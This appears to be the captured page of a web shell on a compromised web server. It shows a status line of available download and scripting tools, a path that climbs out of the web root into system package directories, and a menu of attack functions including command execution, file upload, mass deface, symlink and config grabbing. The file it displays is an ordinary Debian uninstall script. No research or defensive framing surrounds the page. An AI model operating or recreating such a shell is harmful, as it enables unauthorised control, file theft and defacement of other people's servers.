OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/www/html/../../lib/dpkg/info/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/bin/sh set -e # Automatically added by dh_installinit/12.10ubuntu1 if [ -x "/etc/init.d/uuidd" ] && [ "$1" = remove ]; then invoke-rc.d uuidd stop || exit 1 fi # End automatically added section